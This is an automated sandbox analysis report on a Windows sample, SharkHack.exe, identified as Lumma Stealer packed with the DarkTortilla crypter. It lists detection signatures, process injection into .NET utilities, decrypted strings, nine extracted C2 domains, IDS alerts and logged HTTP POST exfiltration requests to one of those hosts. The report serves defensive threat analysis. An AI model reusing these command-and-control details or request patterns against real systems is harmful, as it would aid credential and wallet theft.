
Windows Analysis Report
SharkHack.exe

Overview

General Information

Sample name: SharkHack.exe
Analysis ID: 1582497
MD5: af8f4b24943a56c36283c58af92a66d2
SHA1: 97d2342d59a890a5c1645efeb275e3ad4f061f78
SHA256: 35bfacbefd16ff1a1b942c068a3509ab21b08b830b30ebf659fe83a6d6c8817c
Tags: exe, LummaStealer, user-aachum

Detection

LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to delay execution (extensive OutputDebugStringW loop)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SharkHack.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\SharkHack.exe" MD5: AF8F4B24943A56C36283C58AF92A66D2)
    • InstallUtil.exe (PID: 1360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 4312 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 2476 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • AddInProcess32.exe (PID: 7012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • InstallUtil.exe (PID: 6744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 3672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "aliveindu.click", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "bFcGh6--2912"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |
00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |
00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(13 entries total; first 5 shown)

Source | Rule | Description | Author | Strings
0.2.SharkHack.exe.5e70000.3.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |
7.2.InstallUtil.exe.44e31f0.0.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |
0.2.SharkHack.exe.5e70000.3.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |
7.2.InstallUtil.exe.44e31f0.0.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |
9.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(13 entries total; first 5 shown)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T18:47:00.926245+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 50013 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:02.071916+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 50014 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:03.207695+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 50015 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:01.412207+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:02.547746+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:01.412207+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 104.21.64.143 | 443 | TCP
2024-12-30T18:47:02.547746+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 104.21.64.143 | 443 | TCP

AV Detection

Source: SharkHack.exe | Avira: detected
Source: 10.2.AddInProcess32.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "aliveindu.click", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "bFcGh6--2912"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SharkHack.exe | Joe Sandbox ML: detected
Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmp (all of the following decrypted strings)
String decryptor: cloudewahsj.shop
String decryptor: rabidcowse.shop
String decryptor: noisycuttej.shop
String decryptor: tirepublicerj.shop
String decryptor: framekgirus.shop
String decryptor: wholersorie.shop
String decryptor: abruptyopsn.shop
String decryptor: nearycrepso.shop
String decryptor: aliveindu.click
String decryptor: lid=%s&j=%s&ver=4.0
String decryptor: TeslaBrowser/5.5
String decryptor: - Screen Resoluton:
String decryptor: - Physical Installed Memory:
String decryptor: Workgroup: -
String decryptor: bFcGh6--2912
Source: SharkHack.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: unknown | HTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50015 version: TLS 1.2
Source: SharkHack.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\InstallUtil.pdbK source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbi source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbl source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER11DB.tmp.dmp.13.dr
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbX source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: til.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb1F source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbp source: WER11DB.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb V source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbH source: WER11DB.tmp.dmp.13.dr
Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb`[p source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER11DB.tmp.dmp.13.dr
Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr <{ source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdbYYc source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER11DB.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbn=h source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (all of the following code functions)
Code function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h] | 10_2_0043DCE9
Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 10_2_0043DCE9
Code function: 4x nop then mov esi, edx | 10_2_00408640
Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h | 10_2_0042A050
Code function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h] | 10_2_0043E051
Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h] | 10_2_0043E850
Code function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h] | 10_2_00426000
Code function: 4x nop then jmp ecx | 10_2_0043D818
Code function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h | 10_2_00419820
Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 10_2_00419820
Code function: 4x nop then mov eax, dword ptr [ebp+10h] | 10_2_0043F830
Code function: 4x nop then mov eax, dword ptr [ebp+10h] | 10_2_0043F0CB
Code function: 4x nop then mov byte ptr [edi], dl | 10_2_0042C0CD
Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h] | 10_2_00415882
Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h | 10_2_00415882
Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h | 10_2_004398A0
Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh | 10_2_004390A0
Code function: 4x nop then mov byte ptr [edi], dl | 10_2_0042C140
Code function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh | 10_2_00416148
Code function: 4x nop then movzx esi, byte ptr [esp+ecx+68h] | 10_2_00416148
Code function: 4x nop then mov byte ptr [esi], al | 10_2_00416148
Code function: 4x nop then mov byte ptr [esi], al | 10_2_00416148
Code function: 4x nop then mov word ptr [edi], cx | 10_2_0042895A
Code function: 4x nop then mov ecx, eax | 10_2_0042895A
Code function: 4x nop then movzx esi, word ptr [eax] | 10_2_00424974
Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h | 10_2_00424974
Code function: 4x nop then mov word ptr [eax], cx | 10_2_00428100
Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h | 10_2_00440130
Code function: 4x nop then jmp ecx | 10_2_004229CD
Code function: 4x nop then mov word ptr [eax], cx | 10_2_004229CD
Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 10_2_0043E19A
Code function: 4x nop then mov byte ptr [edi], dl | 10_2_0042C1A3
Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh] | 10_2_0043C1B0
Code function: 4x nop then mov eax, dword ptr [ebp+10h] | 10_2_0043F1B0
Code function: 4x nop then mov word ptr [eax], cx | 10_2_00427A5A
Code function: 4x nop then mov word ptr [edi], ax | 10_2_0041CA60
Code function: 4x nop then mov word ptr [edi], ax | 10_2_0041CA60
Code function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h] | 10_2_0043E262
Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h] | 10_2_00423A60
Code function: 4x nop then mov byte ptr [edi], al | 10_2_0042C26C
Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h] | 10_2_0042C26C
Code function: 4x nop then mov byte ptr [esi], al | 10_2_0042BA79
Code function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh] | 10_2_0040C22D
Code function: 4x nop then mov eax, dword ptr [ebp+10h] | 10_2_0043F2F6
Code function: 4x nop then mov byte ptr [edi], al | 10_2_0042C282
Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h] | 10_2_0042C282
Code function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah] | 10_2_0043EA80
Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 10_2_00429A90
Code function: 4x nop then mov word ptr [eax], cx | 10_2_00426340
Code function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h] | 10_2_00426340
Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 10_2_00402B60
Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h] | 10_2_00426360
Code function: 4x nop then mov word ptr [eax], cx | 10_2_00426360
Code function: 4x nop then mov dword ptr [esp], ecx | 10_2_00419362
Code function: 4x nop then mov word ptr [eax], cx | 10_2_00427B08
Code function: 4x nop then mov eax, dword ptr [ebp+10h] | 10_2_0043F330
Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h] | 10_2_004073C0
Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h] | 10_2_004073C0
Code function: 4x nop then mov eax, dword ptr [ebp+10h] | 10_2_0043F3C0
Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh] | 10_2_0041C3CC
Code function: 4x nop then push esi | 10_2_00420BD3
Code function: 4x nop then test eax, eax | 10_2_004393D0
Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h | 10_2_0043FB80
Code function: 4x nop then mov byte ptr [eax], dl | 10_2_0042238D
Code function: 4x nop then jmp ecx | 10_2_0042238D
Code function: 4x nop then mov edx, eax | 10_2_0043C440
Code function: 4x nop then mov eax, dword ptr [ebp+10h] | 10_2_0043F450
Code function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh] | 10_2_00439C70
Code function: 4x nop then movzx ebx, byte ptr [edx] | 10_2_00435410
Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h] | 10_2_00421C80
Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah | 10_2_00440480
Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h] | 10_2_00416C90
Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h | 10_2_004274A5
Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh] | 10_2_00427CB0
Code function: 4x nop then mov word ptr [eax], cx | 10_2_00427CB0
Code function: 4x nop then mov esi, ecx | 10_2_0043C510
Code function: 4x nop then test eax, eax | 10_2_0043C510
Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h | 10_2_0043C510
Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h] | 10_2_00414DC0
Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h] | 10_2_00416C90
Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h] | 10_2_004155DB
Code function: 4x nop then mov ecx, eax | 10_2_0041AD80
Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h | 10_2_0043FE20
Code function: 4x nop then mov word ptr [ecx], bp | 10_2_0041CECA
Code function: 4x nop then movzx ebx, byte ptr [esp+ecx] | 10_2_0043E6E0
Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h] | 10_2_0040C6F0
Code function: 4x nop then mov byte ptr [edi], bl | 10_2_00408EF0
Code function: 4x nop then mov byte ptr [edi], al | 10_2_0042BE8A
Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h] | 10_2_0042BE8A
Code function: 4x nop then mov byte ptr [ebp+00h], al | 10_2_0041DE90
Code function: 4x nop then mov word ptr [ebx], cx | 10_2_00418740
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [edi], dx10_2_00414777
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [esi], al10_2_0041BFCA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]10_2_004237D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]10_2_00417FE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]10_2_00417FE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [esi], al10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov edx, ecx10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [esi], cx10_2_00416F8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]10_2_00424F91
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_00424F91
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]10_2_0043DFB3

Networking
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50014 -> 104.21.64.143:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50014 -> 104.21.64.143:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50013 -> 104.21.64.143:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50013 -> 104.21.64.143:443
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: aliveindu.click
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50014 -> 104.21.64.143:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50013 -> 104.21.64.143:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50015 -> 104.21.64.143:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: aliveindu.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 46 | Host: aliveindu.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9WGSI9MA6J92 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18126 | Host: aliveindu.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: aliveindu.click
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: aliveindu.click
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.2925272325.0000000001464000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aliveindu.click/
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aliveindu.click/6(
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aliveindu.click/api
Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aliveindu.click:443/api
Source: SharkHack.exe | String found in binary or memory: https://api.quotable.io/random?tags=love
Source: AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: AddInProcess32.exe, 0000000A.00000002.2928100351.0000000003967000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown | HTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50015 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, | 10_2_00432D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, | 10_2_00432FE0
Source: C:\Users\user\Desktop\SharkHack.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SharkHack.exe | Code function: 0_2_089CFC40 CreateProcessAsUserW, | 0_2_089CFC40
